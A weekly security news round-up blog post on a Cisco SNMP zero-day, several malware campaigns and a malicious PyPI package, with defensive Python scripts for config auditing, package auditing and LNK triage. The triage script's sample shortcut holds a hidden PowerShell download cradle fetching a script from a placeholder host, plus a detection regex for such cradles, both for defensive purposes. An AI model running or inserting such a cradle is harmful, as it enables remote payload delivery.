Habdul Hazeez

Security news weekly round-up - 3rd October 2025

As things stand, a world without malware and vulnerabilities is a distant future. Who knows? We might have a solution to these two predominant threats one day, and hopefully you and I will be alive to witness it. Until then, we have to keep ourselves educated about them and give credit to the malware and vulnerability researchers who do the work.

I am pretty sure you already know what we are about to review. Let's begin.


As many as 2 million Cisco devices affected by actively exploited 0-day

The good news: Cisco patched the bug as part of its September 2025 update. The not-so-good news: a search on Shodan turns up as many as 2 million devices with SNMP exposed to the internet, and that exposure is what puts an unpatched device within reach of the crafted packets. Patch, and until then keep SNMP off internet-facing interfaces unless an access list restricts who can talk to it.

More about the vulnerability from the article:

The vulnerability is the result of a stack overflow bug in the IOS component that handles SNMP (simple network management protocol), which routers and other devices use to collect and handle information about devices inside a network. The vulnerability is exploited by sending crafted SNMP packets.
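An added example (my own, not code from the article or from Cisco) of the exposure check implied above: a Python script that reads a Cisco IOS running-config as text and flags SNMP community strings and SNMPv3 groups with no access list attached, meaning the SNMP agent will answer crafted packets from any source that can reach it. The configuration excerpt and the ACL name SNMP-MGMT are constructed for the demonstration. The fix for the bug itself is Cisco's patch; an ACL only narrows who can reach the agent in the meantime.

```python
"""Flag SNMP entries in a Cisco IOS config that accept requests from any source.

Added example, not from the article or Cisco.  Applying the vendor patch is the
fix; this only finds the exposure that makes an unpatched agent reachable.
"""
import re

# Constructed sample running-config; not taken from a real device.
SAMPLE_CONFIG = """\
hostname edge-rtr-1
!
snmp-server community public RO
snmp-server community s3cr3t RW 10
snmp-server community ops view restricted RO
snmp-server group NETOPS v3 priv
snmp-server group NETMON v3 priv access 20
snmp-server host 10.0.0.5 version 2c public
!
access-list 10 permit 10.0.0.0 0.0.0.255
access-list 20 permit 10.0.1.0 0.0.0.255
"""

# snmp-server community <string> [view <name>] [RO|RW] [ipv6 <nacl>] [<acl-number-or-name>]
COMMUNITY_RE = re.compile(
    r"^snmp-server community (?P<name>\S+)"
    r"(?: view \S+)?"
    r"(?: (?P<mode>RO|RW))?"
    r"(?: ipv6 \S+)?"
    r"(?: (?P<acl>\S+))?$"
)
# snmp-server group <name> v3 {auth|noauth|priv} [...] [access <acl>]
GROUP_V3_RE = re.compile(
    r"^snmp-server group (?P<name>\S+) v3 (?:auth|noauth|priv)(?P<rest>.*)$"
)


def find_unrestricted_snmp(config_text):
    """Return [(line_number, line, reason)] for SNMP entries that have no source ACL."""
    findings = []
    for lineno, raw in enumerate(config_text.splitlines(), 1):
        line = raw.strip()
        m = COMMUNITY_RE.match(line)
        if m:
            if not m.group("acl"):
                mode = m.group("mode") or "RO"      # IOS defaults a community to read-only
                findings.append((lineno, line, f"{mode} community reachable from any source"))
            continue
        m = GROUP_V3_RE.match(line)
        if m and " access " not in m.group("rest") + " ":
            findings.append((lineno, line, "v3 group with no access clause"))
    return findings


def hardened_line(line, acl):
    """Suggest the same line with a source ACL appended (the admin chooses the ACL)."""
    if COMMUNITY_RE.match(line) or GROUP_V3_RE.match(line):
        return f"{line} {'access ' if ' v3 ' in line else ''}{acl}"
    return line


if __name__ == "__main__":
    for lineno, line, reason in find_unrestricted_snmp(SAMPLE_CONFIG):
        print(f"line {lineno}: {reason}\n    {line}\n -> {hardened_line(line, 'SNMP-MGMT')}")
```

The script deliberately treats a line with a `view` but no ACL as exposed, since a restricted MIB view still lets anyone on the internet send the agent packets; the ACL is what limits who can reach the parser at all.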

EvilAI Malware Masquerades as AI Tools to Infiltrate Global Organizations

Deception is the attackers' main weapon in this campaign. They also sign their binaries with valid digital signatures, which makes it hard for users and security tools to tell the malware apart from legitimate software. Keep in mind what a signature actually proves: that the file has not been altered since the publisher signed it, not that the publisher is trustworthy or that the program is safe.

From the article:

The campaign has been codenamed EvilAI by Trend Micro, describing the attackers behind the operation as "highly capable" owing to their ability to blur the line between authentic and deceptive software for malware distribution and their ability to conceal its malicious features in otherwise functional applications.

The end goal of the campaign is to conduct extensive reconnaissance, exfiltrate sensitive browser data, and maintain encrypted, real-time communication with its command-and-control (C2) servers using AES-encrypted channels to receive attacker commands and deploy additional payloads.

Android malware uses VNC to give attackers hands-on access

The malware, named Klopatra, exists to steal banking credentials. At the time of writing, it does not appear to be related to any known Android malware family. And yes, it abuses Android's Accessibility Services, which let an app read what is on the screen and act on the user's behalf. So, when an application on your phone requests accessibility access, think twice before granting it.

From the article:

Although the operators of the malware use Cloudflare to hide their digital tracks, a misconfiguration exposed origin IP addresses, which allowed linking the C2 servers to the same provider.

Since March 2025, when Klopatra first appeared in the wild, there have been 40 distinct builds, a sign of active development and quick evolution for the new Android trojan.

Alert: Malicious PyPI Package soopsocks Infects 2,653 Systems Before Takedown

If you downloaded the affected package before it was taken down, here is my advice: uninstall it now. Given what the researchers describe below (firewall rules, elevated permissions, PowerShell commands and a dropped Go executable), also check the machine for leftover firewall rules and persistence, and run a routine security scan of the system.

Here is what the researchers said about the package:

"soopsocks is a well-designed SOCKS5 proxy with full bootstrap Windows support.

"However, given the way it performs and actions it takes during runtime, it shows signs of malicious activity, such as firewall rules, elevated permissions, various PowerShell commands, and the transfer from simple, configurable Python scripts to a Go executable with hardcoded parameters, version with reconnaissance capabilities..."
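An added example (my own, not the researchers' code) of the first step I would take before uninstalling: list what a pip-installed distribution actually placed on disk, using the file list pip records at install time, and flag native executables and script files bundled inside what should be a pure-Python package, since the quote above describes a Go executable and PowerShell activity. The sample file list is constructed for the demonstration and does not describe the real package's contents.

```python
"""Find what a suspicious pip-installed package left behind before uninstalling it.

Added example, not code from the researchers or from PyPI.  pip writes a RECORD
of every file a wheel installs; importlib.metadata exposes that list, so we can
classify each file and see any native binary or script the package dropped.
"""
from importlib import metadata
from pathlib import Path

PE_MAGIC, ELF_MAGIC = b"MZ", b"\x7fELF"
SCRIPT_SUFFIXES = {".ps1", ".bat", ".cmd", ".vbs", ".exe", ".dll"}

# Constructed sample (path, first bytes) pairs; not the real package's layout.
SAMPLE_FILES = [
    ("soopsocks/__init__.py", b"impo"),
    ("soopsocks/proxy.py", b"impo"),
    ("soopsocks/bin/agent.exe", b"MZ\x90\x00"),
    ("soopsocks/setup.ps1", b"Set-"),
    ("soopsocks-0.1.dist-info/RECORD", b"soop"),
]


def classify_file(path, head):
    """Return why the file is worth a look (binary or script), or None for plain files."""
    if head.startswith(PE_MAGIC):
        return "PE executable"
    if head.startswith(ELF_MAGIC):
        return "ELF executable"
    suffix = Path(path).suffix.lower()
    if suffix in SCRIPT_SUFFIXES:
        return f"{suffix} script"
    return None


def suspicious_files(files):
    """files: iterable of (relative_path, first_bytes).  Returns [(path, reason)]."""
    out = []
    for path, head in files:
        reason = classify_file(path, head)
        if reason:
            out.append((path, reason))
    return out


def audit_installed(dist_name):
    """Classify the files pip recorded for dist_name; None if it is not installed."""
    try:
        dist = metadata.distribution(dist_name)
    except metadata.PackageNotFoundError:
        return None
    files = []
    for f in dist.files or []:           # None when the RECORD file is missing
        try:
            head = Path(f.locate()).open("rb").read(4)
        except OSError:
            head = b""
        files.append((str(f), head))
    return suspicious_files(files)


if __name__ == "__main__":
    for path, reason in suspicious_files(SAMPLE_FILES):
        print(f"{reason:15} {path}")
    print("installed check:", audit_installed("soopsocks"))
```

Run it before `pip uninstall`, because uninstalling removes the RECORD that tells you where the dropped files were; anything the package copied outside its own directory at runtime (the quote mentions firewall rules and PowerShell activity) will not be in this list and needs a separate look.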

Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL

At the time of writing, most infections are in Brazil. Now, you might ask: then why are we talking about it? Because the attackers rely on phishing to get it onto people's systems, and here the lure arrives over WhatsApp from a contact whose account is already compromised rather than by email. This should serve as a reminder to watch out for phishing on every channel, not just in your inbox.

From the article:

The starting point of the attack is a phishing message sent from an already compromised contact on WhatsApp to lend it a veneer of credibility. The message contains a ZIP attachment that masquerades as a seemingly harmless receipt or health app-related file.

Should the recipient fall for the trick and open the attachment, they are lured into opening a Windows shortcut (LNK) file that, when launched, silently triggers the execution of a PowerShell script responsible for retrieving the main payload from an external server (e.g., sorvetenopoate[.]com).
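As an added example (my own, not the researchers' or the article's code) of the triage a defender can do on such an attachment: the script below opens a ZIP, parses enough of the Windows shortcut (MS-SHLLINK) format to recover each .lnk member's relative target and command-line arguments, and flags PowerShell download cradles. The archive, the shortcut contents and the host name attacker.invalid are constructed for the demonstration.

```python
"""Triage a ZIP for Windows shortcuts (.lnk) whose target launches PowerShell.

Added example, not from the article or the researchers.  The .lnk parser covers
the ShellLinkHeader, skips LinkTargetIDList/LinkInfo, and reads the StringData
fields, which is where a shortcut's command-line arguments live.
"""
import io
import re
import struct
import zipfile

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80


def build_lnk(arguments, rel_path=r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"):
    """Build a minimal shortcut: 76-byte ShellLinkHeader, then RelativePath and
    Arguments StringData (u16 char count followed by UTF-16LE chars, no terminator)."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII",
                         0x4C, LNK_CLSID, flags, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def string_data(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(rel_path) + string_data(arguments)


def lnk_target(data):
    """Return (relative_path, arguments) from shortcut bytes, or None if not a shortcut."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        return None
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:            # LinkTargetIDList: u16 IDListSize, then the list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:          # LinkInfo: u32 LinkInfoSize, which counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, key in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                      (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                      (HAS_ICON, "icon")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le", "replace")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields.get("relative_path", ""), fields.get("arguments", "")


# PowerShell invoked with a download cradle, encoded command, or evasion switches.
SUSPICIOUS = re.compile(
    r"(?:powershell|pwsh)\b.*?(?:"
    r"-(?:e|ec|enc|encodedcommand)\b|downloadstring|downloadfile|invoke-webrequest|\biwr\b"
    r"|invoke-expression|\biex\b|https?://|-ep\s+bypass|-w(?:indowstyle)?\s+hidden)",
    re.IGNORECASE | re.DOTALL,
)


def triage_zip(zip_bytes):
    """Return [(member_name, command_line, suspicious)] for every .lnk in the archive."""
    results = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            parsed = lnk_target(zf.read(info))
            if parsed is None:
                continue
            command = f"{parsed[0]} {parsed[1]}".strip()
            results.append((info.filename, command, bool(SUSPICIOUS.search(command))))
    return results


def build_sample_zip():
    """Constructed sample: a decoy text file, a benign shortcut, and a shortcut
    posing as a receipt that pulls a script from a placeholder host."""
    cradle = ('-w hidden -ep bypass -c "IEX (New-Object Net.WebClient)'
              ".DownloadString('https://attacker.invalid/stage1.ps1')\"")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("README.txt", "Your receipt is attached.")
        zf.writestr("notes.lnk", build_lnk("", rel_path=r"..\Documents\notes.txt"))
        zf.writestr("receipt.pdf.lnk", build_lnk(cradle))
    return buf.getvalue()


if __name__ == "__main__":
    for name, command, flagged in triage_zip(build_sample_zip()):
        print(f"{'SUSPICIOUS' if flagged else 'ok':10} {name}: {command}")
```

The double extension in `receipt.pdf.lnk` is the same trick described above: Explorer hides the `.lnk` suffix by default, so the victim sees a PDF. A mail gateway or sandbox that runs this kind of check gets to the PowerShell cradle without ever executing the shortcut.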

Credits

Cover photo by Debby Hudson on Unsplash.


That's it for this week, and I'll see you next time.
